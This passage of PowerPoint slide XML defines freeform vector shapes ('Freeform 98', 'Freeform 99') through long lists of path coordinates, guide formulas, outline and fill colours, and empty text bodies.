                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="79"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36366" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3380" y="2753"/>
                <a:ext cx="162" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 162"/>
                  <a:gd name="T1" fmla="*/ 208 h 220"/>
                  <a:gd name="T2" fmla="*/ 0 w 162"/>
                  <a:gd name="T3" fmla="*/ 191 h 220"/>
                  <a:gd name="T4" fmla="*/ 0 w 162"/>
                  <a:gd name="T5" fmla="*/ 169 h 220"/>
                  <a:gd name="T6" fmla="*/ 0 w 162"/>
                  <a:gd name="T7" fmla="*/ 160 h 220"/>
                  <a:gd name="T8" fmla="*/ 0 w 162"/>
                  <a:gd name="T9" fmla="*/ 148 h 220"/>
                  <a:gd name="T10" fmla="*/ 15 w 162"/>
                  <a:gd name="T11" fmla="*/ 126 h 220"/>
                  <a:gd name="T12" fmla="*/ 26 w 162"/>
                  <a:gd name="T13" fmla="*/ 125 h 220"/>
                  <a:gd name="T14" fmla="*/ 30 w 162"/>
                  <a:gd name="T15" fmla="*/ 121 h 220"/>
                  <a:gd name="T16" fmla="*/ 37 w 162"/>
                  <a:gd name="T17" fmla="*/ 116 h 220"/>
                  <a:gd name="T18" fmla="*/ 45 w 162"/>
                  <a:gd name="T19" fmla="*/ 114 h 220"/>
                  <a:gd name="T20" fmla="*/ 63 w 162"/>
                  <a:gd name="T21" fmla="*/ 114 h 220"/>
                  <a:gd name="T22" fmla="*/ 80 w 162"/>
                  <a:gd name="T23" fmla="*/ 96 h 220"/>
                  <a:gd name="T24" fmla="*/ 107 w 162"/>
                  <a:gd name="T25" fmla="*/ 64 h 220"/>
                  <a:gd name="T26" fmla="*/ 84 w 162"/>
                  <a:gd name="T27" fmla="*/ 61 h 220"/>
                  <a:gd name="T28" fmla="*/ 49 w 162"/>
                  <a:gd name="T29" fmla="*/ 49 h 220"/>
                  <a:gd name="T30" fmla="*/ 41 w 162"/>
                  <a:gd name="T31" fmla="*/ 43 h 220"/>
                  <a:gd name="T32" fmla="*/ 31 w 162"/>
                  <a:gd name="T33" fmla="*/ 31 h 220"/>
                  <a:gd name="T34" fmla="*/ 28 w 162"/>
                  <a:gd name="T35" fmla="*/ 23 h 220"/>
                  <a:gd name="T36" fmla="*/ 33 w 162"/>
                  <a:gd name="T37" fmla="*/ 13 h 220"/>
                  <a:gd name="T38" fmla="*/ 36 w 162"/>
                  <a:gd name="T39" fmla="*/ 8 h 220"/>
                  <a:gd name="T40" fmla="*/ 44 w 162"/>
                  <a:gd name="T41" fmla="*/ 16 h 220"/>
                  <a:gd name="T42" fmla="*/ 50 w 162"/>
                  <a:gd name="T43" fmla="*/ 23 h 220"/>
                  <a:gd name="T44" fmla="*/ 54 w 162"/>
                  <a:gd name="T45" fmla="*/ 25 h 220"/>
                  <a:gd name="T46" fmla="*/ 61 w 162"/>
                  <a:gd name="T47" fmla="*/ 25 h 220"/>
                  <a:gd name="T48" fmla="*/ 67 w 162"/>
                  <a:gd name="T49" fmla="*/ 22 h 220"/>
                  <a:gd name="T50" fmla="*/ 77 w 162"/>
                  <a:gd name="T51" fmla="*/ 18 h 220"/>
                  <a:gd name="T52" fmla="*/ 86 w 162"/>
                  <a:gd name="T53" fmla="*/ 21 h 220"/>
                  <a:gd name="T54" fmla="*/ 94 w 162"/>
                  <a:gd name="T55" fmla="*/ 18 h 220"/>
                  <a:gd name="T56" fmla="*/ 101 w 162"/>
                  <a:gd name="T57" fmla="*/ 13 h 220"/>
                  <a:gd name="T58" fmla="*/ 108 w 162"/>
                  <a:gd name="T59" fmla="*/ 14 h 220"/>
                  <a:gd name="T60" fmla="*/ 119 w 162"/>
                  <a:gd name="T61" fmla="*/ 10 h 220"/>
                  <a:gd name="T62" fmla="*/ 126 w 162"/>
                  <a:gd name="T63" fmla="*/ 12 h 220"/>
                  <a:gd name="T64" fmla="*/ 137 w 162"/>
                  <a:gd name="T65" fmla="*/ 10 h 220"/>
                  <a:gd name="T66" fmla="*/ 150 w 162"/>
                  <a:gd name="T67" fmla="*/ 3 h 220"/>
                  <a:gd name="T68" fmla="*/ 158 w 162"/>
                  <a:gd name="T69" fmla="*/ 1 h 220"/>
                  <a:gd name="T70" fmla="*/ 161 w 162"/>
                  <a:gd name="T71" fmla="*/ 3 h 220"/>
                  <a:gd name="T72" fmla="*/ 159 w 162"/>
                  <a:gd name="T73" fmla="*/ 11 h 220"/>
                  <a:gd name="T74" fmla="*/ 160 w 162"/>
                  <a:gd name="T75" fmla="*/ 20 h 220"/>
                  <a:gd name="T76" fmla="*/ 156 w 162"/>
                  <a:gd name="T77" fmla="*/ 27 h 220"/>
                  <a:gd name="T78" fmla="*/ 156 w 162"/>
                  <a:gd name="T79" fmla="*/ 38 h 220"/>
                  <a:gd name="T80" fmla="*/ 146 w 162"/>
                  <a:gd name="T81" fmla="*/ 58 h 220"/>
                  <a:gd name="T82" fmla="*/ 139 w 162"/>
                  <a:gd name="T83" fmla="*/ 66 h 220"/>
                  <a:gd name="T84" fmla="*/ 133 w 162"/>
                  <a:gd name="T85" fmla="*/ 80 h 220"/>
                  <a:gd name="T86" fmla="*/ 126 w 162"/>
                  <a:gd name="T87" fmla="*/ 96 h 220"/>
                  <a:gd name="T88" fmla="*/ 118 w 162"/>
                  <a:gd name="T89" fmla="*/ 108 h 220"/>
                  <a:gd name="T90" fmla="*/ 104 w 162"/>
                  <a:gd name="T91" fmla="*/ 127 h 220"/>
                  <a:gd name="T92" fmla="*/ 85 w 162"/>
                  <a:gd name="T93" fmla="*/ 148 h 220"/>
                  <a:gd name="T94" fmla="*/ 56 w 162"/>
                  <a:gd name="T95" fmla="*/ 167 h 220"/>
                  <a:gd name="T96" fmla="*/ 43 w 162"/>
                  <a:gd name="T97" fmla="*/ 178 h 220"/>
                  <a:gd name="T98" fmla="*/ 30 w 162"/>
                  <a:gd name="T99" fmla="*/ 191 h 220"/>
                  <a:gd name="T100" fmla="*/ 13 w 162"/>
                  <a:gd name="T101" fmla="*/ 210 h 220"/>
                  <a:gd name="T102" fmla="*/ 10 w 162"/>
                  <a:gd name="T103" fmla="*/ 218 h 22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62"/>
                  <a:gd name="T157" fmla="*/ 0 h 220"/>
                  <a:gd name="T158" fmla="*/ 162 w 162"/>
                  <a:gd name="T159" fmla="*/ 220 h 220"/>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62" h="220">
                    <a:moveTo>
                      <a:pt x="9" y="220"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="220"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36367" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
